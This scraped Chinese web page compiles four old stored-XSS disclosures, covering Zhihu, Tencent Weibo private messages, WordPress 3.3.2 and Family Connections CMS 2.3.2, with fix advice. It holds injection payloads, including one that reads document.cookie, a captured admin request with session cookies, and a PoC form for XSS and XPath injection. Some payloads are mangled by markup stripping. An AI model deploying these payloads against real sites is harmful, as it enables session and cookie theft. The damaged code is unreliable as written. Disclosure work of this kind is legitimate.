首页 > 范文大全

知乎一个存储型跨站漏洞及修复

时间：2023年09月01日

来源：元翌

编辑：本站小编

收藏本文

下载本文

下面是小编为大家收集的知乎一个存储型跨站漏洞及修复，本文共4篇，仅供参考，欢迎大家阅读，一起分享。本文原稿由网友“元翌”提供。

篇1：知乎一个存储型跨站漏洞及修复

简要描述：只做了简单的过滤，很容易绕过，

详细说明：个人简介过滤不严，在很多地方都会调用个人简介。

</p><p>插入以上代码别人看到你个人主页，或者看到你回答的问题时等很多地方调用个人简介的地方就会触发，</p><p>写蠕虫的话，传播速度会很快。</p><p>漏洞证明：</p><p>修复方案：</p><p>输出时要强制转义呀……</p><h2>篇2：私信存储型XSS跨站漏洞漏洞预警</h2><p>漏洞标题：私信存储型XSS跨站漏洞</p><p>漏洞类型：xss跨站脚本攻击</p><p>危害等级：高</p><p>简要描述：</p><p>最近大家都流行连载了，</p><p><p>私信存储型XSS跨站漏洞漏洞预警</p></p><p>。那么我们也开场吧~最近心伤的胖子一直在连载，不知道发重复了没。</p><p>详细说明：</p><p>漏洞成因：</p><p>缺陷文件：</p><p>mat1.gtimg.com/www/mb/js/mi_121016.js</p><p>1.首先进入MI.TalkList.picEvent函数</p><p>MI.TalkList.picEvent=function(a){</p><p>....</p><p>其中a为页面中所有class为PicBox的div集合，即div.PicBox</p><p>2.循环每一个class为PicBox的div</p><p>for(varb=0,f=a.length;b</p><p>varg=a[b],</p><p>....</p><p>g为每个div</p><p>3.k=c(g,“img”)[0],获取PicBox里的第一个img图片</p><p>4.h=k.parentNode,获取k的父级元素，是一个链接</p><p>5.j=c(g,“.picTools”),获取PicBox这个div里的picToolsDIV</p><p>6.缺陷在下面这几句JS代码</p><p>if(!MI.user.fun.wideStyle)</p><p>MI.tmpl.picTool=['',_(“向左转”),'|',_(“向右转”),'',_(“查看原图”),“</p><p>”].join(“”);</p><p>UI.before(UI.html(MI.tmpl.picTool.replace(“$Url”,h.href.replace(/\\/460$/g,“”)).replace(“$hisUrl”,l))[0],h);</p><p>MI.tmpl.picTool直接将$Url替换为h.href</p><p>而h在取href属性值时，会自动将“等转换回”,<,>等符号，</p><p>----------------------------------</p><p>结合实际HTML结构，如下：</p><p>k对应用户发送的图片</p><p>h对应k外层的A标签</p><p>...</p><p>h.href中的“<,>等重新转义回了”,<,></p><p>最终导致UI.html(MI.tmpl.picTool.replace(“$Url”,h.href.replace(/\\/460$/g,“”)).replace(“$hisUrl”,l))[0],h)</p><p>在输出HTML时，导致XSS出现</p><p>--------------------------------</p><p>利用方法，发送私信时，</p><p>api.t.qq.com/inbox/pm_mgr.php</p><p>sourcereply</p><p>ptidgainover</p><p>roomid</p><p>content.................</p><p>fid</p><p>arturlt2.qpic.cn/mblogpic/4955e75656b3d175296c/460#“></p><p>(document.cookie);” style=“display:none”><i a=“”></i></p><p>murl</p><p>targetgainover</p>funcsend<p>efjs</p><p>pmlangzh_CN</p><p>apiType8</p><p>apiHostapi.t.qq.com</p><p>漏洞证明：</p><p>对方打开私信时会触发XSS。</p><p>修复方案：</p><p>MI.TalkList.picEvent中 h.href.replace之前先将h.href转义一次～</p><p></p><h2>篇3：WordPress 3.3.2鸡肋存储型跨站漏洞的分析</h2><p>WordPress最新版本3.3.2存在一个双字节编码的存储型跨站漏洞，可以bypass内置的filter机制，但是利用起来有点鸡肋</p>WordPress最新版本3.3.2存在一个双字节编码的存储型跨站漏洞，可以bypass内置的filter机制，但是利用起来有点鸡肋，细节如下：<p>1：登录管理账户</p><p>2：单击分类</p><p>3：填写跨站参数，并用burp suite拦截请求</p><p>4：输入%253cscript%253ealert%25281%2529%253c%252fscript%253e可以直接bypass，</p><p>BURP请求数据包：</p><p>复制代码</p>代码如下:<p>POST /wordpress/wp-admin/edit-tags.php HTTP/1.1</p><p>Host: localhost</p><p>User-Agent: Mozilla/5.0 (X11; Linux i686; rv:11.0) Gecko/0101 Firefox/11.0</p><p>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</p><p>Accept-Language: en-us,en;q=0.5</p><p>Accept-Encoding: gzip, deflate</p><p>Proxy-Connection: keep-alive</p><p>Referer:</p><p>www.jb51.net /wordpress/wp-admin/edit-tags.php?action=edit&taxonomy=link_category&tag_ID=2&post_type=post</p><p>Cookie:</p><p>wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1335544051%7C197b22093eaefaf6950bd81d6aa6372b;</p><p>wp-settings-time-1=1335371272; wordpress_test_cookie=WP+Cookie+check;</p><p>wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1335544051%7C6ebcb9d0104a37c6d7a91274ac94c6cb</p><p>Content-Type: application/x-www-form-urlencoded</p><p>Content-Length: 379</p><p>action=editedtag&tag_ID=2&taxonomy=link_category&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fedit-tags.php%3Ftaxonomy%3Dlink_category&_wpnonce=83974d7f8f&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fedit-tags.php%3Faction%3Dedit%26taxonomy%3Dlink_category%26tag_ID%3D2%26post_type%3Dpost&name=Blogroll&slug=injecthere%253cscript%253ealert%25281%2529%253c%252fscript%253e&description=sectest&submit=Update</p><p>小编：鸡肋，鸡肋中的鸡肋，minminmsn同学应该是翻译自国外的文章，没有经过详细的测试，wordpress默认的filter机制对管理员权限是不过滤的，所以不仅仅在分类里存在跨站，其他地方更是跨站多多，</p><p>也许有其他的猥琐的用途吧。</p><p>作者：freebuf</p><h2>篇4：Family Connections CMS 2.3.2存储型跨站和XPath注入漏洞</h2><p>Family Connections是一个开放源代码的内容管理系统，它可以容易和方便的创建私人家庭站点，Family Connections 2.3.2版存在存储型跨站和XPath注入漏洞可能导致敏感信息泄露。</p><p>[+]info:</p><p>~~~~~~~~~</p><p>Family Connections CMS 2.3.2 (POST) Stored XSS And XPath Injection</p><p>Vendor: Ryan Haudenschilt</p><p>Product web page: www.familycms.com</p><p>Affected version: 2.3.2</p><p>Vulnerability discovered by Gjoko LiquidWorm Krstic</p><p>liquidworm gmail com</p><p>Zero Science Lab - www.zeroscience.mk</p><p>[+]poc:</p><p>~~~~~~~~~</p><p>view source</p><p>print?</p><p>01</p><p>02 <meta content=“width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no;” name=“viewport”><meta content=“yes” name=“apple-mobile-web-app-capable”><meta content=“telephone=no” name=“format-detection”>Family Connections CMS 2.3.2 Stored XSS And XPath Injection</p><p>03</p><p>04</p><p>08 <form. action=“FCMS/inc/getChat.php” enctype=“application/x-www-form-urlencoded” id=“xpath” method=“POST”></form.></p><p>09 <input name=“message” type=“hidden” value=“\\;--\\”></p><p>10</p><p>11<p>Exploit XPath!</p><p>12 <form. action=“FCMS/messageboard.php” enctype=“application/x-www-form-urlencoded” id=“xss” method=“POST”></form.></p><p>13 <input name=“subject” type=“hidden” value=“”></p><p>14 <input name=“post” type=“hidden” value=“waddup”></p><p>15 <input name=“name” type=“hidden” value=“1”></p><p>16 <input name=“post_submit” type=“hidden” value=“Submit”></p><p>17</p><p>18<p>Exploit XSS!</p><p>19</p><p>[+]Reference:</p><p>~~~~~~~~~</p><p>www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5004.php</p><p><a href="/fanwen/167075744584621.html" target="_blank">跨站脚本执行漏洞代码的六个方法</a></p><p><a href="/fanwen/1674599008185594.html" target="_blank">百度的JS数据流注入型跨站</a></p><a tpid="20" href="#" target="_self" class="download_card download_card_box jhcdown" rel="nofollow"> <img class="download_card_pic" src="/jianli/static/article/images/icon_word.2.png" alt="下载知乎一个存储型跨站漏洞及修复（共4篇）"> <div class="download_card_msg"> <div class="download_card_title" style="text-decoration:none;">知乎一个存储型跨站漏洞及修复.doc</div> <div class="download_card_tip">将本文的Word文档下载到电脑，方便收藏和打印</div> <div class="download_card_tj"> <span>推荐度：</span> <img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAMAAABEpIrGAAAAY1BMVEUAAAD/mAD/mgD/mQD/mQD/mQD/mQD/mAD/mQD/mQD/mQD//wD/mQD/mAD/nwD/mQD/mAD/mQD/mQD/mgD/mAD/mQD/mAD/mAD/mQD/mgD/mQD/mgD/lwD/mQD/lQD/mwD/mQAl+fFuAAAAIHRSTlMA7ytS5M++uGk2JAGqjAzr1ZKFR/agl005MMxiYF8YF49KoKIAAAC9SURBVDjLlZJZCsMwDETl2vEWZ9+76v6nrAkhYCUR7fsyzGNgsOBP8mHIWUEiSragRqxzvoBW0IJIxhdEpkshQ2QrJtzomIKritK9WoM7pni6EjZm22iFJyjdWAcgkUWCF1wuPMAimPwGkZvgcmrQnDOqmFOD5pxReUiwVLCQUlChIIKhgiGCooIiv4kHykSYj4I7HdG3bb89H4nQ4Mr4AXiPZzM0RoKHFR/WGXSEXmDHaToj3Mkld1mA3/gCrXs1vl7stYYAAAAASUVORK5CYII="> <img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAMAAABEpIrGAAAAY1BMVEUAAAD/mAD/mgD/mQD/mQD/mQD/mQD/mAD/mQD/mQD/mQD//wD/mQD/mAD/nwD/mQD/mAD/mQD/mQD/mgD/mAD/mQD/mAD/mAD/mQD/mgD/mQD/mgD/lwD/mQD/lQD/mwD/mQAl+fFuAAAAIHRSTlMA7ytS5M++uGk2JAGqjAzr1ZKFR/agl005MMxiYF8YF49KoKIAAAC9SURBVDjLlZJZCsMwDETl2vEWZ9+76v6nrAkhYCUR7fsyzGNgsOBP8mHIWUEiSragRqxzvoBW0IJIxhdEpkshQ2QrJtzomIKritK9WoM7pni6EjZm22iFJyjdWAcgkUWCF1wuPMAimPwGkZvgcmrQnDOqmFOD5pxReUiwVLCQUlChIIKhgiGCooIiv4kHykSYj4I7HdG3bb89H4nQ4Mr4AXiPZzM0RoKHFR/WGXSEXmDHaToj3Mkld1mA3/gCrXs1vl7stYYAAAAASUVORK5CYII="> <img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAMAAABEpIrGAAAAY1BMVEUAAAD/mAD/mgD/mQD/mQD/mQD/mQD/mAD/mQD/mQD/mQD//wD/mQD/mAD/nwD/mQD/mAD/mQD/mQD/mgD/mAD/mQD/mAD/mAD/mQD/mgD/mQD/mgD/lwD/mQD/lQD/mwD/mQAl+fFuAAAAIHRSTlMA7ytS5M++uGk2JAGqjAzr1ZKFR/agl005MMxiYF8YF49KoKIAAAC9SURBVDjLlZJZCsMwDETl2vEWZ9+76v6nrAkhYCUR7fsyzGNgsOBP8mHIWUEiSragRqxzvoBW0IJIxhdEpkshQ2QrJtzomIKritK9WoM7pni6EjZm22iFJyjdWAcgkUWCF1wuPMAimPwGkZvgcmrQnDOqmFOD5pxReUiwVLCQUlChIIKhgiGCooIiv4kHykSYj4I7HdG3bb89H4nQ4Mr4AXiPZzM0RoKHFR/WGXSEXmDHaToj3Mkld1mA3/gCrXs1vl7stYYAAAAASUVORK5CYII="> <img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAMAAABEpIrGAAAAY1BMVEUAAAD/mAD/mgD/mQD/mQD/mQD/mQD/mAD/mQD/mQD/mQD//wD/mQD/mAD/nwD/mQD/mAD/mQD/mQD/mgD/mAD/mQD/mAD/mAD/mQD/mgD/mQD/mgD/lwD/mQD/lQD/mwD/mQAl+fFuAAAAIHRSTlMA7ytS5M++uGk2JAGqjAzr1ZKFR/agl005MMxiYF8YF49KoKIAAAC9SURBVDjLlZJZCsMwDETl2vEWZ9+76v6nrAkhYCUR7fsyzGNgsOBP8mHIWUEiSragRqxzvoBW0IJIxhdEpkshQ2QrJtzomIKritK9WoM7pni6EjZm22iFJyjdWAcgkUWCF1wuPMAimPwGkZvgcmrQnDOqmFOD5pxReUiwVLCQUlChIIKhgiGCooIiv4kHykSYj4I7HdG3bb89H4nQ4Mr4AXiPZzM0RoKHFR/WGXSEXmDHaToj3Mkld1mA3/gCrXs1vl7stYYAAAAASUVORK5CYII="> <img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAMAAABEpIrGAAAAY1BMVEUAAAD/mAD/mgD/mQD/mQD/mQD/mQD/mAD/mQD/mQD/mQD//wD/mQD/mAD/nwD/mQD/mAD/mQD/mQD/mgD/mAD/mQD/mAD/mAD/mQD/mgD/mQD/mgD/lwD/mQD/lQD/mwD/mQAl+fFuAAAAIHRSTlMA7ytS5M++uGk2JAGqjAzr1ZKFR/agl005MMxiYF8YF49KoKIAAAC9SURBVDjLlZJZCsMwDETl2vEWZ9+76v6nrAkhYCUR7fsyzGNgsOBP8mHIWUEiSragRqxzvoBW0IJIxhdEpkshQ2QrJtzomIKritK9WoM7pni6EjZm22iFJyjdWAcgkUWCF1wuPMAimPwGkZvgcmrQnDOqmFOD5pxReUiwVLCQUlChIIKhgiGCooIiv4kHykSYj4I7HdG3bb89H4nQ4Mr4AXiPZzM0RoKHFR/WGXSEXmDHaToj3Mkld1mA3/gCrXs1vl7stYYAAAAASUVORK5CYII="> </div> </div> <div class="download_card_btn"> <em></em> <div class="downlod_btn_right"> <div>点击下载文档</div> </div> </div> </a> </div> <div class="news_A"> <div class="title_ul"> <span>最新范文</span><a href="/fanwen/" class="more">更多<i></i></a> </div> <ul class="news_ul"></ul> </div> </div> </div> <div class="centRight"> <div class="Rit_A"> <span class="more_bt">热门文章</span> <ul class="ul_list"></ul> </div> <div class="Rit_A"> <span class="more_bt">猜你喜欢</span> <div class="a_list"> </div> </div> </div> </div> </div> </div> <div class="fixed_item"><a tpid="20" href="#" target="_self" class="jhcdown" rel="nofollow"><em></em>点击下载本文文档</a></div> <div class="Qz_foot"> <div class="footer_basew"> <p>    Copyright © 2018-2028 https://www.gerenjianli.net/ All Rights Reserved <a href="https://beian.miit.gov.cn">浙ICP备2022017720号-1</a></p> <p>本站作品均来自互联网，转载目的在于传递更多信息，并不代表本站赞同其观点和对其真实性负责。如有侵犯您的版权，请联系我们。</p> </div> </div> <script type="text/javascript" src="/jianli/static/article/js/style.js"></script> <script type="text/javascript" src="/skin/default/js/right.js"></script> </body> </html>